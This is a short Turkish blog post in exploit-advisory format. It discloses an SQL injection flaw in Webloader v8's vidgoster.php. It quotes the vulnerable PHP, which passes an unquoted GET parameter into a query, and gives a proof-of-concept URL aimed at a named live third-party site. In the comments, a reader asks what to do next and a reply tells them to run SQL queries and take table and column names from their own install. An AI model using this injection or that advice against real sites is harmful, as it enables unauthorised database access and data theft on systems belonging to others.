23 Mayıs 2010 Pazar

Webloader v8 SQL Injection Vulnerability

[~] Title: Webloader v8 SQL Injection Vulnerability

[~] Date: 24.05.2010

[~] Script Home: www.webloader.org
   
[~] Author: ByEge

[~] Homepage: byege.blogspot.com

[~][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][~]


[~] vidgoster.php Bug code     :

[~] 

[~]  [~]  include 'baglan.php';
[~]  $vid=temiz($_GET['vid']);

[~]  $c=solcek("select * from webvideo where id=$vid");
[~]  $va=solarray($c);

[~]  ?>


[~]  Example     :

[~]  http://tamerotik.com/vidgoster.php?vid=1'


[~][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][~]

[~]  Th4nks :  Fantastik, MitolocyA, ISYAN,

2 yorum :

  1. http://tamerotik.com/vidgoster.php?vid=1'

    adresine girdikten sonra hangi işlemleri uygulıycaz.

    YanıtlaSil
  2. normal SQL sorgu yap kardeşim bide v8 kurulu olan bir siten varsa ordan column ve tablo isimlerinede bakarsın ok.

    YanıtlaSil